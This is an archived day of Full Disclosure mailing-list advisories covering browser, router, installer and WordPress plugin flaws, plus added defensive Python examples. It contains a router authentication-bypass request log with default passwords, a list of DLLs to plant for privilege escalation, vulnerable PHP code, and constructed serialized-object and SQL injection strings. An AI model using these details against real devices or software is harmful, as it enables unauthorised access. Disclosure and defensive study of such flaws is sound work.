[FD] Tetris heap spraying: spraying the heap on a budget

2016-11-18 Thread Berend-Jan Wever
L.S.

Over the past decade, heap sprays have become almost synonymous with
exploits in web-browsers. After having developed my first practical
implementation of a heap spray about ten years ago, I found that the
amount of memory needed in some cases was too much for a realistic
attack scenario. I needed a new kind of heap spray that did not allocate
as much RAM as traditional heap sprays do. So, I developed a heap spray
that uses significantly less RAM than a traditional heap spray does. In
practice it uses about 33% less in most cases, but theoretically it
could be much, much less in ideal situations. This
technique requires only the ability to free some of the blocks of memory
used to spray the heap during spraying and should otherwise be
applicable to every existing implementation.

I wrote an article on my blog that describes the technical details of
this technique, you can find it here:

http://blog.skylined.nl/20161118001.html

I recently used this technique in a Proof-of-Concept for a vulnerability
in Microsoft Edge. You can find details about that vulnerability and the
PoC here:

http://blog.skylined.nl/20161118002.html

Cheers,

SkyLined


0x2557C5AA.asc
Description: application/pgp-keys


signature.asc
Description: OpenPGP digital signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2016-3247 Microsoft Edge CTextExtractor::GetBlockText OOB read details

2016-11-18 Thread Berend-Jan Wever
Throughout November, I plan to release details on vulnerabilities I
found in web-browsers which I've not released before. This is the
fourteenth entry in that series. Unfortunately I won't be able to
publish everything within one month at the current rate, so I may
continue to publish these through December and January.

The below information is available in more detail on my blog at
http://blog.skylined.nl/20161118002.html.

Follow me on http://twitter.com/berendjanwever for daily browser bugs.

Microsoft Edge CTextExtractor::GetBlockText OOB read
====================================================
(MS16-104, CVE-2016-3247)

Synopsis

A specially crafted web-page can cause an integer underflow in Microsoft
Edge. This causes `CTextExtractor::GetBlockText` to read data outside of
the bounds of a memory block.

Known affected software, attack vectors and mitigations
-------------------------------------------------------
* Microsoft Edge 11.0.10240.16384
  An attacker would need to get a target user to open a specially
  crafted web-page. JavaScript is not necessarily required to trigger
  the issue.

Description
-----------
Though I did not investigate thoroughly, I did find out the following:
* The root cause appears to be an integer underflow in a 32-bit
  variable used in `CTextExtractor::GetBlockText` as an index to read a
  `WCHAR` in a string buffer. This index is decreased once too often
  and becomes -1, or a very large positive number depending on how it
  is used.
* This does not result in a crash on 32-bit systems, as an integer wrap
  causes the code to read one `WCHAR` before the start of the buffer,
  which is normally also in allocated memory.
* On 64-bit systems, the 32-bit -1 value is interpreted as 0x,
  a very large positive value. As this is an index into a `WCHAR`
  string, it gets multiplied by two and added to the start of the
  buffer to find the location of a `WCHAR` to read. This causes the OOB
  read to be around 8Gb (!!) beyond the address at which the buffer is
  allocated.
* The crash happens in code that appears to be rendering the web-page,
  which does not immediately offer an obvious way of extracting
  information using this bug.

Exploit
-------
This is where it gets interesting, as the OOB read happens
approximately 0x2` bytes after the address at which the buffer
is allocated. This presents us with a problem: how to store some
information that we'd be interested in reading at such a large offset
from the original allocation?

As one might come to expect from me, I used a heap spray. But it needed
to be a special kind of heap spray as I did not want to actually have to
allocate 8Gb of RAM. However, about ten years ago (boy, time flies!) I
developed a heap spray that uses significantly less RAM than a
traditional heap spray does; in practice probably about 33% in most
cases, but theoretically much more in ideal situations. I've been
meaning to blog about it, but never found the time to do so until today:
you can read all about it here:

http://blog.skylined.nl/20161118001.html

That said, I have not actually looked at whether it is possible to
exfiltrate useful information using this bug. However, I did write a
Proof-of-Concept that attempts to make sure something is allocated in
the area where the OOB read happens. This PoC uses these heap spray
tricks to spray the heap while minimizing memory use. The
Proof-of-Concept uses about ~5.3Gb to allocate the memory at around 8Gb
distance from the buffer (up to ~10Gb to be sure). When you load the PoC
in a 64-bit version of Edge, you may notice that, unlike the original
repro, it will not crash Edge (even though it does trigger the
issues): the heap spray has allocated the memory that the out-of-bounds
read accesses, and this prevents an access violation exception.
Refreshing the page is likely to screw up the precise allocation process
needed and will probably cause a crash.

This proves that it is theoretically possible to allocate information at
the address used by the code. All that is left is to prove that the
information read by the code can be exfiltrated somehow, and you have a
working exploit. This is left as an exercise to the reader.

Time-line
---------
* June 2016: This vulnerability was found through fuzzing.
* June 2016: This vulnerability was submitted to ZDI and iDefense.
* July 2016: This vulnerability was acquired by ZDI.
* September 2016: This vulnerability was addressed by Microsoft in
  MS16-104.
* November 2016: Details of this issue are released.

Cheers,

SkyLined


0x2557C5AA.asc
Description: application/pgp-keys


signature.asc
Description: OpenPGP digital signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
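The arithmetic behind the 32-bit versus 64-bit behaviour described in the post, modelled in Python. This is an added illustration by the editor, not code from the post or from Microsoft Edge: it reduces an index that has been decremented to -1 to its 32-bit pattern, scales it by sizeof(WCHAR) in the pointer width of each target, and pairs that with the bounds check the vulnerable path lacks. The UTF-16 sample buffer is constructed.

```python
"""Arithmetic behind the advisory's OOB read: a 32-bit index that has been
decremented once too often holds -1, and the distance it puts between the
buffer and the WCHAR actually read depends on the pointer width.
Added illustration by the editor, not code from the post or from Edge."""

WCHAR_SIZE = 2          # bytes per UTF-16 code unit
INDEX_BITS = 32         # width of the variable that underflows


def scaled_offset(index: int, pointer_bits: int) -> int:
    """Byte offset that index * sizeof(WCHAR) adds to the buffer base.

    The index is first reduced to its 32-bit pattern (-1 -> 0xFFFFFFFF).
    On a 64-bit target that pattern is zero-extended before scaling, so the
    product never wraps and is a huge positive distance.  On a 32-bit target
    the product wraps in 32 bits, which is why the same -1 reaches one WCHAR
    *before* the buffer (offset -2).  Returned as a signed value of the
    pointer's width.
    """
    idx_bits = index & ((1 << INDEX_BITS) - 1)
    raw = (idx_bits * WCHAR_SIZE) & ((1 << pointer_bits) - 1)
    if raw >= 1 << (pointer_bits - 1):        # reinterpret as two's complement
        raw -= 1 << pointer_bits
    return raw


def offset_in_gib(index: int, pointer_bits: int) -> float:
    """Same offset expressed in GiB, to compare with the '8Gb' in the post."""
    return scaled_offset(index, pointer_bits) / float(1 << 30)


def read_wchar_checked(buf: bytes, index: int) -> int:
    """Bounds-checked read of code unit `index` from a UTF-16LE buffer.

    The index is validated as a signed quantity against the unit count
    *before* it is scaled, so neither the 32-bit wrap nor the 64-bit
    zero-extension can move the read outside the allocation.
    """
    count = len(buf) // WCHAR_SIZE
    if not 0 <= index < count:
        raise IndexError(f"index {index} outside [0, {count})")
    off = index * WCHAR_SIZE
    return int.from_bytes(buf[off:off + WCHAR_SIZE], "little")


def read_is_rejected(buf: bytes, index: int) -> bool:
    """True when the checked reader refuses `index`."""
    try:
        read_wchar_checked(buf, index)
    except IndexError:
        return True
    return False


if __name__ == "__main__":
    sample = "text".encode("utf-16-le")       # constructed 4-unit buffer
    for bits in (32, 64):
        off = scaled_offset(-1, bits)
        print(f"{bits}-bit: index -1 -> offset {off:+d} bytes "
              f"({offset_in_gib(-1, bits):+.3f} GiB)")
    print("checked read of index 3:", chr(read_wchar_checked(sample, 3)))
    print("checked read of index -1 rejected:", read_is_rejected(sample, -1))
```

Running it shows the two outcomes the post describes: -2 bytes (one WCHAR before the buffer) on a 32-bit target and roughly 8 GiB beyond it on a 64-bit one; the checked reader rejects the index either way.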

[FD] Huawei Flybox B660 3G/4G Router - Auth Bypass Vulnerability

2016-11-18 Thread Vulnerability Lab
Document Title:
===
Huawei Flybox B660 3G/4G Router - Auth Bypass Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2010

Huawei ID: 558969357627813


Release Date:
=
2016-11-18


Vulnerability Laboratory ID (VL-ID):

2010


Common Vulnerability Scoring System:

7.4


Product & Service Introduction:
===
The Huawei B660 has a web interface for configuration. You can use any web 
browser you like to login to the Huawei B660.

(Copy of the Homepage: 
http://setuprouter.com/router/huawei/b660/manual-1184.pdf )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a security flaw that 
affects the official Huawei Flybox B660 3g/4g router product series.


Vulnerability Disclosure Timeline:
==
2016-11-18: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Huawei
Product: Flybox - Router (Web-Application) B660 3G/4G


Exploitation Technique:
===
Remote


Severity Level:
===
Critical


Technical Details & Description:

A remote auth bypass vulnerability has been discovered in the official Huawei 
Flybox B660 3G/4G router product series. The security vulnerability allows 
remote attackers to compromise any Huawei Flybox B660 admin panel using a new 
bypass method.

The vulnerability is located in the `./htmlcode/html/` modules and the 
`indexdefault.asp` file of the localhost path URL. Remote attackers are able 
to compromise any Huawei Flybox B660 admin panel via an unauthenticated GET 
method request. 

The security risk of the issue is estimated as critical with a cvss count of 
7.4. (CVSS 7.4)
Exploitation of the web vulnerability requires no privileged account or user 
interaction. 
Successful exploitation of the vulnerability results in compromise of the 
Huawei Flybox device.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] /htmlcode/html/

Vulnerable File(s):
[+] indexdefault.asp


Software version of the modem:
1066.12.15.01.200

Hardware version of the modem:
WLB3TCLU

Name of the device:
B660

Hardware version of the router:
WL1B660I001

Software version of the router:
1066.11.15.02.110sp01


Proof of Concept (PoC):
===
The vulnerability can be exploited by remote attackers without privileged user 
account or user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.

After buying a Huawei Flybox B660, the company sets up a password for you such 
as "admin", "12345" or "5". We figured out that when you lose your password, 
you can attempt to connect multiple times using the plain passwords above. 
After the third request the connection is refused with an exception message; 
by intercepting the request and bypassing the error it is possible to bypass 
the authentication mechanism of the 3G/4G router device. The problem in the 
Huawei Flybox B660 is the following: there is no test whether the password is 
false or true. If an attacker tries a false password many times in requests, 
after bypassing the error they are redirected to change the password 
permanently.


--- PoC Session Logs [GET] ---
GET /htmlcode/html/contentdefault.asp HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8
Cookie: login_url=settings; CNZZDATA1260483764=1049902387-1478277586-%7C1478277586; Basic=index; Language=en; SessionID_R3=1006428909
Referer: http://localhost/htmlcode/html/content.asp
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36 OPR/41.0.2353.46

HTTP/1.1 200 OK
CACHE-CONTROL: no-cache
Content-Length: 5776
Content-Type: text/html


PoC Video: https://www.youtube.com/watch?v=-xzedPTNv6c 


Solution - Fix & Patch:
===
N/A


Security Risk:
==
The security risk of the remote vulnerability in the Huawei Flybox B660 3G/4G 
router is estimated as critical. (CVSS 7.4)



Credits & Authors:
==
SaifAllah benMassaoud - ( 
http://www.vulnerability-lab.com/show.php?user=SaifAllahbenMassaoud )



Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential 
loss of business prof

[FD] Executable installers are vulnerable^WEVIL (case 41): EmsiSoft's Emergency Kit allows elevation of privilege for everybody

2016-11-18 Thread Stefan Kanthak
Hi @ll,

in response to 
EmsiSoft fixed some of the DLL hijacking vulnerabilities in some
of their executable installers and unpackers.

EmsisoftEmergencyKit.exe still has beginner's errors which allow
escalation of privilege for EVERY local user:

0. while the self-extracting WinRAR archive EmsisoftEmergencyKit.exe
   doesn't load DLLs from its "application directory" any more, its
   payload still shows this vulnerability!

1. due to "requireAdministrator" in its application manifest the
   self-extractor runs with administrative rights, although it
   neither needs them nor uses them.

2. it creates the directory "%SystemDrive%\EEK" and unpacks its
   payload into it.

   JFTR: since it runs with administrative rights the self-
   extractor could create "%SystemDrive%\EEK" with an ACL
   that only allows write-access for administrators, or
   use "%ProgramFiles%\EmsiSoft\Emergency Kit" instead.

   This directory inherits the ACL of its parent, %SystemDrive%,
   which allows write access for unprivileged users; they can thus
   modify all files extracted there or add files, for example a
   "%SystemDrive%\EEK\Version.dll".

   Also give NetAPI32.dll, NetUtils.dll, SrvCli.dll, WksCli.dll,
   PropSys.dll, AppHelp.dll, NTMarta.dll, Secur32.dll, MPR.dll and
   CSCAPI.dll a try.

3. the programs "%SystemDrive%\EEK\Start Commandline Scanner.exe"
   and "%SystemDrive%\EEK\Start Emergency Kit Scanner.exe" have
   "requireAdministrator" in their application manifests too: they
   load and execute the DLLs named above from "%SystemDrive%\EEK"
   with administrative rights.

4. the other programs extracted to "%SystemDrive%\EEK\bin32" and
   "%SystemDrive%\EEK\bin64" are also run with administrative
   rights.

5. of course the programs in "%SystemDrive%\EEK\bin32" and
   "%SystemDrive%\EEK\bin64" load and execute DLLs from their
   "application directory" (which is writable for everyone) too.

And one more:

6. the OpenSSL libraries shipped are from version 1.0.2d and have
   multiple vulnerabilities which have been fixed in version 1.0.2j.


stay tuned
Stefan Kanthak


Timeline:
~~~~~~~~~

2016-08-29    vulnerability report sent to vendor

2016-08-29    vendor acknowledges vulnerability, promises to update
              at least the OpenSSL libraries, and to ask the author of
              WinRAR to add a directive to protect the created EEK
              directory

2016-11-17    vendor fixed NOTHING in the past ELEVEN weeks, and
              does not react any more -> report published

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] SQL injection and unserialization vulnerability in Relevanssi Premium could allow admins to execute arbitrary code (in some circumstances) (WordPress plugin)

2016-11-18 Thread dxw Security
Details

Software: Relevanssi Premium
Version: v1.14.4
Homepage: https://www.relevanssi.com/
Advisory report: 
https://security.dxw.com/advisories/sql-injection-and-unserialization-vulnerability-in-relevanssi-premium-could-allow-admins-to-execute-arbitrary-code-in-some-circumstances/
CVE: Awaiting assignment
CVSS: 9 (High; AV:N/AC:L/Au:S/C:C/I:C/A:C)

Description

SQL injection and unserialization vulnerability in Relevanssi Premium could 
allow admins to execute arbitrary code (in some circumstances)

Vulnerability

Relevanssi has a search function on the admin side that is not visible in the 
user interface; however, the code is there and can be called. This functionality 
contains an SQL injection, and this SQL injection can be exploited to pass user 
controlled values into an unserialization call and run arbitrary code (if there 
are classes available with particular methods such as __destruct).

If a logged in admin user is tricked into going to an attacker controlled 
website, JavaScript could be written to make the admin's browser submit the 
above request without their knowledge (see 2.3 Social engineering, p.18). 
Alternatively this attack can be exploited by an attacker with Admin privileges.

Proof of concept

Achieving arbitrary code execution depends on which classes are available (i.e. 
which plugins and themes are installed and active). It won’t be possible in all 
situations.

Mitigations

Upgrade to version 1.14.6.1 or later.

Disclosure policy

dxw believes in responsible disclosure. Your attention is drawn to our 
disclosure policy: https://security.dxw.com/disclosure/

Please contact us on secur...@dxw.com to acknowledge this report if you 
received it via a third party (for example, plug...@wordpress.org) as they 
generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this 
report within 14 days.

Timeline


2016-10-07: Discovered
2016-11-01: Reported
2016-11-02: Vendor reported fixed
2016-11-17: Requested CVE
2016-11-17: Advisory published



Discovered by dxw:

Glyn Wintle
Please visit security.dxw.com for more information.
  


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Unserialization vulnerability in Relevanssi Premium could allow admins to execute arbitrary code (in some circumstances) (WordPress plugin)

2016-11-18 Thread dxw Security
Details

Software: Relevanssi Premium
Version: v1.14.4
Homepage: https://www.relevanssi.com/
Advisory report: 
https://security.dxw.com/advisories/unserialization-vulnerability-in-relevanssi-premium-could-allow-admins-to-execute-arbitrary-code-in-some-circumstances/
CVE: Awaiting assignment
CVSS: 9 (High; AV:N/AC:L/Au:S/C:C/I:C/A:C)

Description

Unserialization vulnerability in Relevanssi Premium could allow admins to 
execute arbitrary code (in some circumstances)

Vulnerability

If logged in as an admin on any site you can go to Settings, Relevanssi 
Premium, import or export options. This is a text field that accepts a 
serialised PHP object. It is possible to submit a string that contains an evil 
encoded object that executes arbitrary code (if there are classes available 
with particular methods such as __destruct).

Proof of concept

Achieving arbitrary code execution depends on which classes are available (i.e. 
which plugins and themes are installed and active). It won’t be possible in all 
situations.

Mitigations

Upgrade to version 1.14.6.1 or later.

Disclosure policy

dxw believes in responsible disclosure. Your attention is drawn to our 
disclosure policy: https://security.dxw.com/disclosure/

Please contact us on secur...@dxw.com to acknowledge this report if you 
received it via a third party (for example, plug...@wordpress.org) as they 
generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this 
report within 14 days.

Timeline


2016-10-07: Discovered
2016-11-01: Reported
2016-11-02: Vendor reported fixed
2016-11-17: Requested CVE
2016-11-17: Advisory published



Discovered by dxw:

Glyn Wintle
Please visit security.dxw.com for more information.
  


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Unserialisation in Post Indexer could allow man-in-the-middle to execute arbitrary code (in some circumstances) (WordPress plugin)

2016-11-18 Thread dxw Security
Details

Software: Post Indexer
Version: 3.0.6.1
Homepage: http://premium.wpmudev.org/project/post-indexer/
Advisory report: 
https://security.dxw.com/advisories/unserialisation-in-post-indexer-could-allow-man-in-the-middle-to-execute-arbitrary-code-in-some-circumstances/
CVE: Awaiting assignment
CVSS: 7.6 (High; AV:N/AC:H/Au:N/C:C/I:C/A:C)

Description

Unserialisation in Post Indexer could allow man-in-the-middle to execute 
arbitrary code (in some circumstances)

Vulnerability

Twice a day the blog makes an automated unencrypted HTTP request to 
premium.wpmudev.org and the value that is returned is passed to unserialize(). 
It is possible for premium.wpmudev.org or anyone on the network in a 
man-in-the-middle position to return a string that contains an evil encoded 
object that executes arbitrary code (depending on the active plugins and 
themes).

This code is called twice a day by wp_schedule_event(time(), 'twicedaily', 
'wpmudev_scheduled_jobs') (extra/wpmudev-dash-notification.php):

var $server_url = 'http://premium.wpmudev.org/wdp-un.php'; // line 12
$url = $this->server_url . '?action=check&un-version=3.3.3&wp=' . 
urlencode($wp) . '&bcount=' . $blog_count . '&domain=' . 
urlencode(network_site_url()) . $projects; // line 393
$response = wp_remote_get($url, $options); // line 400
$data = $response['body']; // line 402
$data = unserialize($data); // line 404

There is a class called ProcessLocker in this plugin with an exploitable 
__destruct method, which could be used as a jumping-off point for attacks using 
this unserialize() vulnerability (or the use of unserialize() in WordPress core, 
which requires access to the database to exploit).

Proof of concept

Achieving arbitrary code execution depends on which classes are available (i.e. 
which plugins and themes are installed and active). It won’t be possible in all 
situations.

Mitigations

Upgrade to version 3.0.6.2 or later.

Disclosure policy

dxw believes in responsible disclosure. Your attention is drawn to our 
disclosure policy: https://security.dxw.com/disclosure/

Please contact us on secur...@dxw.com to acknowledge this report if you 
received it via a third party (for example, plug...@wordpress.org) as they 
generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this 
report within 14 days.

Timeline


2016-11-01: Discovered
2016-11-14: Reported to plugin author via https://premium.wpmudev.org/contact/
2016-11-14: Plugin author responded
2016-11-17: Confirmed that version 3.0.6.2 fixes the issue
2016-11-17: Requested CVE
2016-11-17: Advisory published



Discovered by dxw:

Glyn Wintle
Please visit security.dxw.com for more information.
  


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
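The three dxw advisories above (the Relevanssi Premium admin search, the Relevanssi import/export field, and the Post Indexer update check) share one root cause: attacker-reachable bytes are handed to PHP's unserialize(), which will instantiate whatever class the data names. The defensive counterpart is to parse the format without ever constructing an object. The following is an added example written by the editor, not code from dxw, WordPress or either plugin: a small Python parser for PHP serialize() output that accepts only scalars and arrays and refuses object and reference tokens before any value is built. The sample payloads are constructed; "ProcessLocker" is the class the Post Indexer advisory names.

```python
"""Defensive parser for PHP serialize() output that never instantiates an
object.  Added example by the editor for the dxw advisories; not code from
dxw, WordPress or the plugins.  Sample payloads are constructed."""


class UnsafeSerializedData(ValueError):
    """Raised on any token that would make PHP's unserialize() build an object."""


def parse_php_serialized(data: bytes):
    """Decode N;, b:, i:, d:, s: and a: tokens into Python values.

    O: (object), C: (custom-serialized object) and r:/R: (references) are
    refused before anything is reconstructed.  This is the hard-failure
    version of unserialize($data, ['allowed_classes' => false]) in PHP >= 7,
    which downgrades objects to __PHP_Incomplete_Class instead of erroring.
    """
    value, end = _parse(data, 0)
    if end != len(data):
        raise ValueError(f"trailing bytes after offset {end}")
    return value


def _expect(d: bytes, i: int, lit: bytes) -> None:
    if d[i:i + len(lit)] != lit:
        raise ValueError(f"expected {lit!r} at offset {i}")


def _parse(d: bytes, i: int):
    tok = d[i:i + 1]
    if tok == b"N":                                     # N;
        _expect(d, i + 1, b";")
        return None, i + 2
    if tok in (b"b", b"i", b"d"):                       # b:1;  i:42;  d:1.5;
        _expect(d, i + 1, b":")
        end = d.index(b";", i + 2)
        raw = d[i + 2:end]
        if tok == b"b":
            val = raw == b"1"
        elif tok == b"i":
            val = int(raw)
        else:
            val = float(raw)
        return val, end + 1
    if tok == b"s":                                     # s:<bytes>:"...";
        _expect(d, i + 1, b":")
        colon = d.index(b":", i + 2)
        n = int(d[i + 2:colon])                          # byte length, not chars
        _expect(d, colon + 1, b'"')
        start = colon + 2
        _expect(d, start + n, b'";')
        return d[start:start + n].decode("utf-8"), start + n + 2
    if tok == b"a":                                     # a:<count>:{key;value...}
        _expect(d, i + 1, b":")
        colon = d.index(b":", i + 2)
        n = int(d[i + 2:colon])
        _expect(d, colon + 1, b"{")
        pos = colon + 2
        out = {}
        for _ in range(n):
            key, pos = _parse(d, pos)
            if type(key) not in (int, str):             # PHP keys are int|string
                raise ValueError(f"bad array key type at offset {pos}")
            val, pos = _parse(d, pos)
            out[key] = val
        _expect(d, pos, b"}")
        return out, pos + 1
    if tok in (b"O", b"C", b"r", b"R"):
        raise UnsafeSerializedData(f"refusing token {tok.decode()!r} at offset {i}")
    raise ValueError(f"unexpected byte {tok!r} at offset {i}")


def is_safe_to_unserialize(body: bytes) -> bool:
    """Gate for bytes arriving from the network or a form field: True only if
    the body parses completely as plain scalars and arrays."""
    try:
        parse_php_serialized(body)
    except ValueError:          # UnsafeSerializedData is a ValueError too
        return False
    return True


# Constructed samples: a benign update-check style answer, then the same
# object token at top level and nested inside an array.
BENIGN = b'a:2:{s:7:"version";s:5:"3.3.3";s:7:"updates";a:1:{i:0;s:3:"foo";}}'
OBJECT_TOP = b'O:13:"ProcessLocker":0:{}'
OBJECT_NESTED = b'a:1:{s:4:"data";O:13:"ProcessLocker":0:{}}'

if __name__ == "__main__":
    print(parse_php_serialized(BENIGN))
    for sample in (OBJECT_TOP, OBJECT_NESTED):
        verdict = "accepted" if is_safe_to_unserialize(sample) else "refused"
        print(sample.decode(), "->", verdict)
```

For the Post Indexer case the parser only removes the deserialisation gadget; the unencrypted HTTP fetch is the other half of the problem, and moving the update check to HTTPS with certificate validation is what takes the man-in-the-middle out of the picture.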

[FD] SQL Injection in Post Indexer allows super admins to read the contents of the database (WordPress plugin)

2016-11-18 Thread dxw Security
Details

Software: Post Indexer
Version: 3.0.6.1
Homepage: http://premium.wpmudev.org/project/post-indexer/
Advisory report: 
https://security.dxw.com/advisories/sql-injection-in-post-indexer-allows-super-admins-to-read-the-contents-of-the-database/
CVE: Awaiting assignment
CVSS: 4 (Medium; AV:N/AC:L/Au:S/C:P/I:N/A:N)

Description

SQL Injection in Post Indexer allows super admins to read the contents of the 
database

Vulnerability

Post Indexer does not use prepared queries in many cases, and in some of its 
database calls it uses backticks (`). These are not automatically escaped by 
WordPress, thus leading to the possibility of SQL injection. In other places in 
the code it simply takes user controlled values and adds them to SQL queries. 
An example of this is remove_posts_older_than:

// classes/class.model.php line 589
function remove_posts_older_than( $unit, $period ) {
    // ...
    $sql = $this->db->prepare( "SELECT BLOG_ID, ID FROM {$this->network_posts} WHERE DATE_ADD(post_date, INTERVAL %d " . $period . ") < CURRENT_DATE() LIMIT %d", $unit, PI_CRON_TIDY_DELETE_LIMIT );
    $posts = $this->db->get_results( $sql );
    // ...
}

The value of $period is user-controlled and could easily be replaced with SQL:

// classes/cron.postindexerrebuild.php line 310
function process_tidy_agedposts($DEBUG = false) {
    // ...
    // The default is to remove posts from the index when they are over a year old
    $agedposts = get_site_option( 'postindexer_agedposts', array( 'agedunit' => 1, 'agedperiod' => 'year' ) );
    // ...
    $this->model->remove_posts_older_than( $agedposts['agedunit'], $agedposts['agedperiod'] );
    // ...
}

To exploit this vulnerability you need to be a super admin.

Proof of concept


Mitigations

Upgrade to version 3.0.6.2 or later.

Disclosure policy

dxw believes in responsible disclosure. Your attention is drawn to our 
disclosure policy: https://security.dxw.com/disclosure/

Please contact us on secur...@dxw.com to acknowledge this report if you 
received it via a third party (for example, plug...@wordpress.org) as they 
generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this 
report within 14 days.

Timeline


2016-11-01: Discovered
2016-11-14: Reported to plugin author via https://premium.wpmudev.org/contact/
2016-11-14: Plugin author responded
2016-11-17: Confirmed that version 3.0.6.2 fixes the issue
2016-11-17: Requested CVE
2016-11-17: Advisory published



Discovered by dxw:

Glyn Wintle
Please visit security.dxw.com for more information.
  


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
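The query quoted in the advisory shows a pattern worth spelling out: $wpdb->prepare() binds the %d placeholders, but the INTERVAL unit and any backtick-quoted identifier are part of the SQL text and cannot be bound, so concatenating $period leaves it unprotected. The following is an added example by the editor, not code from Post Indexer or WordPress, that models the shipped pattern in Python next to a hardened form where every non-bindable fragment (interval unit, identifier) is allow-listed before it enters the statement. The table name is the one in the advisory's query; the malicious option value and the limit constant are constructed stand-ins.

```python
"""Bound placeholders versus concatenated SQL fragments, modelled on the
remove_posts_older_than() query in the dxw advisory.  Added example by the
editor; not code from Post Indexer or WordPress.  TIDY_DELETE_LIMIT stands in
for PI_CRON_TIDY_DELETE_LIMIT and the evil period string is constructed."""

import re

# MySQL interval units are keywords: they cannot be bound as parameters, so the
# only safe way to take one from configuration is an allow-list.
INTERVAL_UNITS = frozenset({
    "MICROSECOND", "SECOND", "MINUTE", "HOUR", "DAY",
    "WEEK", "MONTH", "QUARTER", "YEAR",
})
IDENTIFIER = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
TIDY_DELETE_LIMIT = 100


def build_query_as_shipped(unit, period, table="wp_network_posts") -> str:
    """Mirror of the vulnerable pattern: `unit` goes through a numeric
    placeholder (int() here, %d in prepare()) while `period` is concatenated
    into the SQL text verbatim."""
    return (
        f"SELECT BLOG_ID, ID FROM {table} "
        f"WHERE DATE_ADD(post_date, INTERVAL {int(unit)} {period}) "
        f"< CURRENT_DATE() LIMIT {TIDY_DELETE_LIMIT}"
    )


def quote_identifier(name: str) -> str:
    """Backtick-quote a table or column name after validating it.  prepare()
    does not escape identifiers, so validation must happen before the
    backticks go around the name."""
    if not IDENTIFIER.match(name):
        raise ValueError(f"invalid SQL identifier: {name!r}")
    return f"`{name}`"


def interval_unit(period) -> str:
    """Normalise a configured period and accept it only if it is a known unit."""
    unit = str(period).strip().upper()
    if unit not in INTERVAL_UNITS:
        raise ValueError(f"invalid interval unit: {period!r}")
    return unit


def build_query_hardened(unit, period, table="wp_network_posts") -> str:
    """Every non-bindable fragment is allow-listed; the integers would still be
    bound with %d in real code."""
    return (
        f"SELECT BLOG_ID, ID FROM {quote_identifier(table)} "
        f"WHERE DATE_ADD(post_date, INTERVAL {int(unit)} {interval_unit(period)}) "
        f"< CURRENT_DATE() LIMIT {TIDY_DELETE_LIMIT}"
    )


def query_is_rejected(unit, period, table="wp_network_posts") -> bool:
    """True when the hardened builder refuses the inputs."""
    try:
        build_query_hardened(unit, period, table)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    evil_period = "YEAR) OR 1=1 -- "        # constructed 'agedperiod' value
    print("shipped :", build_query_as_shipped(1, evil_period))
    print("hardened:", build_query_hardened(1, "year"))
    print("hardened rejects evil period:", query_is_rejected(1, evil_period))
```

The point of the allow-list is that it is the only option for SQL keywords and identifiers: a bound parameter is always treated as a value, so it cannot carry a unit or a table name, and anything that has to become syntax must be validated against a fixed set instead.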

[FD] /tmp race condition in Teradata Studio Express v15.12.00.00 studioexpressinstall

2016-11-18 Thread Larry W. Cashdollar
Title: /tmp race condition in Teradata Studio Express v15.12.00.00 
studioexpressinstall
Author: Larry W. Cashdollar, @_larry0
Date: 2016-10-03
Download Site: 
http://downloads.teradata.com/download/tools/teradata-studio-express
Vendor: Teradata
Vendor Notified: 2016-10-03
Vendor Contact: web form contact
Description: Teradata Studio Express provides an information discovery tool 
that retrieves data from Teradata Database systems and allows the data to be 
manipulated and stored on the desktop. It is built on the Eclipse Rich Client 
Platform (RCP). 
Vulnerability:
The installation script for TeradataStudioExpress.15.12.00.00 creates files in 
/tmp insecurely.  A malicious local user could create a symlink in /tmp and 
possibly clobber system files or perhaps elevate privileges.

$ grep -n "/tmp" studioexpressinstall 

33:ASKDIRFILE=/tmp/sqlajeaskdir
41:DEF_TRACEFILE=/tmp/studioexinstall.log
44:TMP=/tmp
72:SQLAJEINPUTS=/tmp/studioexinputs
90:RPM_OUT_FILE=/tmp/studioexinstall_rpmcmd.out
103:SQLAJEINSTALL=/tmp/studioexpressinstall
136:   java -version > "/tmp/javaver" 2>&1
137:   verstring=`grep "java version" /tmp/javaver`
143:  jre64b=`grep "64-Bit" /tmp/javaver`
212:rm -f /tmp/javaver 
341:   tmptracefile=/tmp/studioexinstall.log.tmp#Temporary trace file.
588:touch /tmp/checkstudioexinstall
603:rm -f /tmp/checkstudioexinstall
604:rm -f /tmp/studioexinstall_rpmcmd.out

CVE-ID: CVE-2016-7490
